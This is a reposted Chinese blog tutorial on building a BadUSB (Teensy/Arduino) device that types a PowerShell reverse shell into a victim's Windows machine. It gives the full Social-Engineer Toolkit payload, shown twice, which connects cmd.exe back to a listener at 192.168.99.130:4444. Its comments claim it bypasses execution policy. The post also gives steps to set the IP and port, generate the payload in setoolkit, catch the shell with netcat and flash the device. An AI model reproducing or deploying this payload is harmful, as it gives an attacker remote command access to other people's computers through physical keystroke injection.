badusb_nc反弹shell
来源:互联网 发布:数据库开发工程师累吗 编辑:程序博客网 时间:2024/04/27 22:13
转载请注明来自 b0t0w1’blog
思路为运用powershell连接监听机,把powershell的命令烧录进badusb中。
payload:
//// Social-Engineer Toolkit Teensy Attack Vector// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)//// Special thanks to: Irongeek// You will need to setup a netcat listener MSF cannot handle this payload//// 2011-02-28 padzero@gmail.com// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets// * Changed from script to interactive powershell execution: Bypass Restricted Powershell Execution Policies//#define ascii_println Keyboard.printlnvoid setup() { delay(10000); omg("powershell"); delay(1000); // Here is the payload... // This is a reverse bind shell through powershell. I need to fix it use the // bind shell. The reverse bind shell code is cleaner though. // I bet we could use the dip switches to configure the IP addy or port... ascii_println("function cleanup {"); ascii_println("if ($client.Connected -eq $true) {$client.Close()}"); ascii_println("if ($process.ExitCode -ne $null) {$process.Close()}"); ascii_println("exit}"); // Setup 192.168.99.130 HERE ascii_println("$address = '192.168.99.130'"); // Setup PORT HERE ascii_println("$port = '4444'"); ascii_println("$client = New-Object system.net.sockets.tcpclient"); ascii_println("$client.connect($address,$port)"); ascii_println("$stream = $client.GetStream()"); ascii_println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize"); ascii_println("$process = New-Object System.Diagnostics.Process"); ascii_println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'"); ascii_println("$process.StartInfo.RedirectStandardInput = 1"); ascii_println("$process.StartInfo.RedirectStandardOutput = 1"); ascii_println("$process.StartInfo.UseShellExecute = 0"); ascii_println("$process.Start()"); ascii_println("$inputstream = $process.StandardInput"); ascii_println("$outputstream = $process.StandardOutput"); ascii_println("Start-Sleep 1"); ascii_println("$encoding = new-object System.Text.AsciiEncoding"); ascii_println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}"); ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.Length)"); ascii_println("$out = $null; $done = $false; $testing = 0;"); ascii_println("while (-not $done) {"); ascii_println("if ($client.Connected -ne $true) {cleanup}"); ascii_println("$pos = 0; $i = 1"); ascii_println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {"); ascii_println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)"); ascii_println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}"); ascii_println("if ($pos -gt 0) {"); ascii_println("$string = $encoding.GetString($networkbuffer,0,$pos)"); ascii_println("$inputstream.write($string)"); ascii_println("start-sleep 1"); ascii_println("if ($process.ExitCode -ne $null) {cleanup}"); ascii_println("else {"); ascii_println("$out = $encoding.GetString($outputstream.Read())"); ascii_println("while($outputstream.Peek() -ne -1){"); ascii_println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}"); ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.length)"); ascii_println("$out = $null"); ascii_println("$string = $null}} else {cleanup}}"); ascii_println(""); //Enter to start execution}void loop() {}void omg(char *SomeCommand){ Keyboard.set_modifier(128); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(1500); ascii_println(SomeCommand);}//// Social-Engineer Toolkit Teensy Attack Vector// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)//// Special thanks to: Irongeek// You will need to setup a netcat listener MSF cannot handle this payload//// 2011-02-28 padzero@gmail.com// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets// * Changed from script to interactive powershell execution: Bypass Restricted Powershell Execution Policies//#define ascii_println Keyboard.printlnvoid setup() { delay(10000); omg("powershell"); delay(1000); // Here is the payload... // This is a reverse bind shell through powershell. I need to fix it use the // bind shell. The reverse bind shell code is cleaner though. // I bet we could use the dip switches to configure the IP addy or port... ascii_println("function cleanup {"); ascii_println("if ($client.Connected -eq $true) {$client.Close()}"); ascii_println("if ($process.ExitCode -ne $null) {$process.Close()}"); ascii_println("exit}"); // Setup 192.168.99.130 HERE ascii_println("$address = '192.168.99.130'"); // Setup PORT HERE ascii_println("$port = '4444'"); ascii_println("$client = New-Object system.net.sockets.tcpclient"); ascii_println("$client.connect($address,$port)"); ascii_println("$stream = $client.GetStream()"); ascii_println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize"); ascii_println("$process = New-Object System.Diagnostics.Process"); ascii_println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'"); ascii_println("$process.StartInfo.RedirectStandardInput = 1"); ascii_println("$process.StartInfo.RedirectStandardOutput = 1"); ascii_println("$process.StartInfo.UseShellExecute = 0"); ascii_println("$process.Start()"); ascii_println("$inputstream = $process.StandardInput"); ascii_println("$outputstream = $process.StandardOutput"); ascii_println("Start-Sleep 1"); ascii_println("$encoding = new-object System.Text.AsciiEncoding"); ascii_println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}"); ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.Length)"); ascii_println("$out = $null; $done = $false; $testing = 0;"); ascii_println("while (-not $done) {"); ascii_println("if ($client.Connected -ne $true) {cleanup}"); ascii_println("$pos = 0; $i = 1"); ascii_println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {"); ascii_println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)"); ascii_println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}"); ascii_println("if ($pos -gt 0) {"); ascii_println("$string = $encoding.GetString($networkbuffer,0,$pos)"); ascii_println("$inputstream.write($string)"); ascii_println("start-sleep 1"); ascii_println("if ($process.ExitCode -ne $null) {cleanup}"); ascii_println("else {"); ascii_println("$out = $encoding.GetString($outputstream.Read())"); ascii_println("while($outputstream.Peek() -ne -1){"); ascii_println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}"); ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.length)"); ascii_println("$out = $null"); ascii_println("$string = $null}} else {cleanup}}"); ascii_println(""); //Enter to start execution}void loop() {}void omg(char *SomeCommand){ Keyboard.set_modifier(128); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(1500); ascii_println(SomeCommand);}
这里使用靶机的powershell连接监听机。如果是xp等则没有用。
payload是kali set 工具箱中给出的payload代码,使用时需要该的地方是109行和111行的ip以及端口号。ip为监听的ip,推荐使用linux监听,port是监听所用的端口。或者可以亲自在kali中生成:
在 terminal 中输入:
setoolkit
进去后依次选择1、6、3。即可生成。
前面的注释信息也指出,这里必须用 nc 进行监听
使用meterpreter不会成功.
显示貌似获得了shell,其实并没有得到meterpreter。
使用 nc 监听4444端口,获得了靶机的shell。
使用方法依然是跟以前一样,把payload保存为 .pde 格式,直接拖进arduino即可,然后烧录。
转载请注明来自 b0t0w1’blog
0 0
- badusb_nc反弹shell
- 反弹shell
- 反弹shell
- NC反弹Shell
- Linux 一句话反弹shell
- 反弹 shell 脚本
- bash反弹shell
- 反弹Shell总结
- python 反弹shell
- 一句话反弹shell
- python 接收反弹shell
- shell反弹理解
- PHP反弹Cmd/Shell 脚本
- Linux下反弹shell方法
- 各种反弹shell的方式
- 使用nc反弹shell方法
- 另一种反弹shell的方式
- 各种语言一句话反弹shell
- Android PopupWindow的使用
- 几个数学小技巧小学生必知(家长收藏)
- Android Volley二次封装
- 深入word2vec(1) - 第一次训练
- 在CSDN建立博客的原因
- badusb_nc反弹shell
- java -jar
- Xcode 7遇到 App Transport Security has blocked a cleartext HTTP 错误
- VS2013中应用项目生成DLL
- 编写windows服务程序
- 实现带描边的圆角图片
- Java URL处理
- Android 打开文件对话框与保存文件对话框
- 2016年1月13日19:10:43